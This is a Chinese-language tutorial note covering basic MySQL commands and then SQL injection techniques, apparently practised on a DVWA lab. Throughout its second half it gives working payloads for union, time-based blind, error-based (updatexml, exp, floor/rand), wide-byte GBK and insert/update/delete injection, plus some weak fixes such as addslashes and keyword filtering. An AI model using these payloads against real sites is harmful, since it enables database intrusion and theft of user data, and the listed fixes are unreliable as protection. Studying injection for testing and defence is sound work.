Mysql的一些基本操作命令
创建数据库:create database XXX;
查看数据库:show databases;
切换数据库:use XXX;
删除数据库:drop database XXX;
创建数据表:1
2
3
4
5
6create table teacher(
id int(4) not null primary key auto_increment,
name char(20) not null,
sex char(10) not null,
addr char(20) not null
);
查看数据表:show tables
插入数据表:insert into teacher(name,sex,addr) values('leo','male','hangzhou');
查询数据表:select * from teacher;
查看表的结构:desc XX;
更新数据:update teacher set name="X" where id=X;
删除数据:delete from teacher where name="X";
order by用于排序:select information from table order by X ASC/DESC;
union可以用来连接两个信息,即增加一项select
LIMIT用法:SELECT * FROM table LIMIT offset, rows
第一个数字指的是起始行,第二数字指的是获取的行数!
一些常用的数据库查询命令
1.当前数据库的所有表
select table_name from information_schema.TABLES where TABLE_SCHEMA=database();
2.获取表中的所有列的名字
select column_name from information_schema.columns where table_name='表名'
判断时字符串注入还是整型注入
1.当加单引号进行闭合后,会报错或者无内容显示:
select * from table where id=3’
2.当不用单引号闭合,并且在后面加条件会按照条件的逻辑顺序显示,则判断为整型注入
select * from table where id=3 and 1=1
不满足以上两点就时字符串注入,其特征有以下几点:
1.当用单引号闭合后还是会报错,因为闭合后单引号个数不匹配:
select * from table where name=’admin’’
2.需要对后面的内容进行注释,注释符号为-- (后面有个空格)#
延时注入
延时注入主要用于不显示错误信息的情况下对数据库名字,表的名字,列的名字进行显示的一种方法。
if(ascii(subtring("hello",1,1))=104,sleep(5),0);
可以看到,取出"hello"里的第一个字符串,也就是"h",判断他的ascii码是否为104("h"的ascii码为104),如果是则延时5秒,反之不延时。同样,我们可以在substring函数里面写SQL语句,提取出我们所要查的表名、列名,再用延时猜解出来。
联合注入
首先可以通过order by来试探出总共有多少个字段
http://rushrush.com/DVWA/vulnerabilities/sqli/?id=1 order by 1
还可以通过union select查看当前数据库的某些表
http://rushrush.com/DVWA/vulnerabilities/sqli/?id=1 union select 1,database(),3 LIMIT 1,1
不过这种情况不适合用于盲注的场景,因为没有输出反馈
别名
在查询数据库的时候可以给列的名字取一个别名,以下两张图为示例:
下图中用了’as’作为别名显示的字符
其中‘as’可写可不写
Mysql之bug注入
利用数据库的BUG进行利用,看输出的报错信息,因为报错的信息中包含了我们想要获取的信息。
只要是count(),rand,group by三个连用就会造成BUG报错(一般表中的数据需要三条以上),如下代码
select concat(floor(rand(0)*2),(select database())) as x,count(1) from student group by x;
就会在报错中显示数据库的名字!
Mysql注入之函数报错
有许多函数可以利用,如updatexml, exp, geometrycollection, polygon, multipoint, multilinestring, multipolygon
通过UpdateXml报错,注入语句如下:
& 1=(updatexml(1,concat(0x3a,(select user())),1))
通过exp报错,注入的语句如下:
& exp(~(select * from (select user()) a))
通过GeometryCollection()报错,注入语句如下:
& geometrycollection((select * from(select * from(select user())a)b))
后两句会因为版本问题失效。。。
Mysql注入的修补
对于字符串的修补,在PHP程序中,用addslashes()函数,将符号包括用来闭合的单引号转义,即在符号前面加一个‘’
对于int型的数据,可以在获取过程中对其加0,若输入是字符串则会自动转型成int,避免了注入的威胁。因为若输入一个字符串,在转型过程中只会保留第一个数字字符而舍去后面的字符。
还可以通过搜索输入字符串中是否存在像“select”"from"等的关键词,将关键词转型,则可以实现注入修补
宽字节注入
在前面可以看到,通过用转义来实现对Mysql的修补,然而通过利用宽字节可以实现恢复单引号闭合。
大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠,变成了 %df’,其中的十六进制是 %5C ,那么现在 %df’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df’ = %df%5c%27=縗’,有了单引号就好注入了。
insert,update,delete注入
三者的区别在于其注入的那句程序是insert,update还是delete
三者都支持报错注入
insert注入
一个insert注入的例子:
1.确认是否存在注入
2.获取数据库名:
or updatexml('',concat(0x7e,(SELECT DATABASE())),0x7e) or
3.获取表名:
or updatexml('',concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 2,1)),0x7e)
4.获取字段名:
or updatexml('',concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0x7e)
5.获取数据
or updatexml('',concat(0x7e,(SELECT concat_ws(':',user_id,first_name,last_name) FROM users limit 0,1)),0x7e)
如果是inset一般要增加右括号,因为根据insert的语句,闭合括号再对口面部分进行注释可以实现注入。
delete注入
delete注入部分支持布尔注入和延时注入和报错注入
延时注入的一个语句范例:
delete from users where user_id=1 and sleep(if(database()='dvwa',5,1));
经过上述语句可以用来确定一些信息,而且不会执行delete,即不会删除数据库中的条目
update注入
update同理只是将操作数据库的命令变成了update,下面是一个例子:
update teacher set name="Gou" where id=1 and sleep(if(database()='test',5,1));
Mysql注入经常用到的函数
1.HEX()函数,能够将字符或者数字转成十六进制
2.ASCII()函数和ORD(),将字符转成对应ASCII表上的数字,区别在于ord能进行多字节的字符处理
3.char()函数,能从数字还原出对应的ASCII码